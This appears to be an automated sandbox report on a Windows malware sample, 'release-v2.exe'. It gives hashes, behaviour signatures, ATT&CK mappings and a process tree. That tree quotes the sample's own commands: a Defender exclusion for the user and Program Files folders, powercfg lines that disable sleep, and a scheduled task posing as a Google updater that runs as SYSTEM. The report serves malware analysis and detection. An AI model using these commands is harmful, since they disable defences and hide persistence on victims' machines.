Analysis

  • max time kernel
    154s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    21-07-2023 22:39

General

  • Target

    release-v2.exe

  • Size

    6.1MB

  • MD5

    f7acd0852bb12402618146b0d16f354e

  • SHA1

    211e1174154435cf731ffd70c69cc9050f924174

  • SHA256

    02131c1bff27d6b1d89013f963095a425a32f8506e69799e7087554461bbbd9d

  • SHA512

    6dee8dcc59d0ac59728c7750cba5c570797e91cd39755c4b910c95ee0dfb3b0e1c69d954970a3638ded9ec411927226c2468adc39471671ea7f96ebe402298cc

  • SSDEEP

    196608:pNsMnreFZyDr0jUSCYKdY0ZVeQ+KMm6XOeRJpyrMS0kRkZ0YezmEse7IBWc7pH9K:pyc7/Zd31VC7WcVHdPa4c15D

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 32 IoCs
  • Modifies data under HKEY_USERS 9 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:484
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:468
      • C:\Windows\Explorer.EXE
        C:\Windows\Explorer.EXE
        1⤵
          PID:1252
          • C:\Users\Admin\AppData\Local\Temp\release-v2.exe
            "C:\Users\Admin\AppData\Local\Temp\release-v2.exe"
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Drops file in Drivers directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2264
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2564
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2976
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-ac 0
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2740
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:1500
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
              2⤵
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2768
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
                3⤵
                • Creates scheduled task(s)
                PID:2332
            • C:\Windows\System32\dialer.exe
              C:\Windows\System32\dialer.exe
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2752
          • C:\Windows\system32\lsm.exe
            C:\Windows\system32\lsm.exe
            1⤵
              PID:492
            • C:\Windows\system32\winlogon.exe
              winlogon.exe
              1⤵
                PID:424
              • C:\Windows\system32\Dwm.exe
                "C:\Windows\system32\Dwm.exe"
                1⤵
                  PID:572
                • C:\Windows\system32\csrss.exe
                  %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
                  1⤵
                  • Enumerates system info in registry
                  • Suspicious use of WriteProcessMemory
                  PID:2040
                • C:\Windows\system32\winlogon.exe
                  winlogon.exe
                  1⤵
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2796
                  • C:\Windows\system32\LogonUI.exe
                    "LogonUI.exe" /flags:0x0
                    2⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1344

                Network

                MITRE ATT&CK Matrix ATT&CK v13

                Execution

                Scheduled Task/Job

                1
                T1053

                Persistence

                Scheduled Task/Job

                1
                T1053

                Privilege Escalation

                Scheduled Task/Job

                1
                T1053

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                1
                T1082

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1HH8E2YOGAM1AKLL57SR.temp
                  Filesize

                  7KB

                  MD5

                  a21e8324e445b828c69c29c60d890376

                  SHA1

                  f5515ace26ed818ccaf2d1ed14cef9dc7afde2ba

                  SHA256

                  4393832f449297850d8c243f23912605ceaeab1250e608ceccea4239c4c2b422

                  SHA512

                  1f7a825d8086f647ba99fa351a9d34150da6724305672f17d7a561efdc77c823f25a70aee4067e73c1cfb68652d57e05395c001d1c19703cadb43dfbd809920e

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
                  Filesize

                  7KB

                  MD5

                  a21e8324e445b828c69c29c60d890376

                  SHA1

                  f5515ace26ed818ccaf2d1ed14cef9dc7afde2ba

                  SHA256

                  4393832f449297850d8c243f23912605ceaeab1250e608ceccea4239c4c2b422

                  SHA512

                  1f7a825d8086f647ba99fa351a9d34150da6724305672f17d7a561efdc77c823f25a70aee4067e73c1cfb68652d57e05395c001d1c19703cadb43dfbd809920e

                • memory/424-72-0x0000000000720000-0x0000000000741000-memory.dmp
                  Filesize

                  132KB

                • memory/424-77-0x0000000000750000-0x0000000000777000-memory.dmp
                  Filesize

                  156KB

                • memory/424-76-0x0000000000750000-0x0000000000777000-memory.dmp
                  Filesize

                  156KB

                • memory/424-74-0x0000000000720000-0x0000000000741000-memory.dmp
                  Filesize

                  132KB

                • memory/468-91-0x00000000002F0000-0x0000000000317000-memory.dmp
                  Filesize

                  156KB

                • memory/468-96-0x0000000037B00000-0x0000000037B10000-memory.dmp
                  Filesize

                  64KB

                • memory/468-115-0x0000000077B11000-0x0000000077B12000-memory.dmp
                  Filesize

                  4KB

                • memory/468-114-0x00000000002F0000-0x0000000000317000-memory.dmp
                  Filesize

                  156KB

                • memory/468-93-0x000007FEBDCD0000-0x000007FEBDCE0000-memory.dmp
                  Filesize

                  64KB

                • memory/484-105-0x0000000037B00000-0x0000000037B10000-memory.dmp
                  Filesize

                  64KB

                • memory/484-102-0x000007FEBDCD0000-0x000007FEBDCE0000-memory.dmp
                  Filesize

                  64KB

                • memory/484-98-0x0000000000250000-0x0000000000277000-memory.dmp
                  Filesize

                  156KB

                • memory/484-116-0x0000000000250000-0x0000000000277000-memory.dmp
                  Filesize

                  156KB

                • memory/492-120-0x0000000000330000-0x0000000000357000-memory.dmp
                  Filesize

                  156KB

                • memory/492-112-0x0000000037B00000-0x0000000037B10000-memory.dmp
                  Filesize

                  64KB

                • memory/492-110-0x000007FEBDCD0000-0x000007FEBDCE0000-memory.dmp
                  Filesize

                  64KB

                • memory/492-106-0x0000000000330000-0x0000000000357000-memory.dmp
                  Filesize

                  156KB

                • memory/1344-122-0x00000000026E0000-0x00000000026E1000-memory.dmp
                  Filesize

                  4KB

                • memory/1344-121-0x00000000026E0000-0x00000000026E1000-memory.dmp
                  Filesize

                  4KB

                • memory/2264-80-0x000000013F650000-0x000000013FC67000-memory.dmp
                  Filesize

                  6.1MB

                • memory/2264-54-0x000000013F650000-0x000000013FC67000-memory.dmp
                  Filesize

                  6.1MB

                • memory/2564-60-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2564-64-0x00000000022F0000-0x0000000002370000-memory.dmp
                  Filesize

                  512KB

                • memory/2564-65-0x00000000022F0000-0x0000000002370000-memory.dmp
                  Filesize

                  512KB

                • memory/2564-63-0x00000000022D0000-0x00000000022D8000-memory.dmp
                  Filesize

                  32KB

                • memory/2564-59-0x000000001B2F0000-0x000000001B5D2000-memory.dmp
                  Filesize

                  2.9MB

                • memory/2564-61-0x00000000022F0000-0x0000000002370000-memory.dmp
                  Filesize

                  512KB

                • memory/2564-62-0x00000000022F0000-0x0000000002370000-memory.dmp
                  Filesize

                  512KB

                • memory/2564-66-0x000007FEF5DF0000-0x000007FEF678D000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2752-71-0x00000000778A0000-0x00000000779BF000-memory.dmp
                  Filesize

                  1.1MB

                • memory/2752-69-0x0000000077AC0000-0x0000000077C69000-memory.dmp
                  Filesize

                  1.7MB

                • memory/2752-108-0x0000000077AC0000-0x0000000077C69000-memory.dmp
                  Filesize

                  1.7MB

                • memory/2752-104-0x0000000140000000-0x0000000140029000-memory.dmp
                  Filesize

                  164KB

                • memory/2768-94-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2768-111-0x0000000001EF0000-0x0000000001F70000-memory.dmp
                  Filesize

                  512KB

                • memory/2768-117-0x0000000001EF4000-0x0000000001EF7000-memory.dmp
                  Filesize

                  12KB

                • memory/2768-90-0x0000000001EF0000-0x0000000001F70000-memory.dmp
                  Filesize

                  512KB

                • memory/2768-118-0x0000000001EF0000-0x0000000001F70000-memory.dmp
                  Filesize

                  512KB

                • memory/2768-88-0x0000000001F80000-0x0000000001F88000-memory.dmp
                  Filesize

                  32KB

                • memory/2768-119-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2768-87-0x000007FEF5450000-0x000007FEF5DED000-memory.dmp
                  Filesize

                  9.6MB

                • memory/2768-85-0x000000001B160000-0x000000001B442000-memory.dmp
                  Filesize

                  2.9MB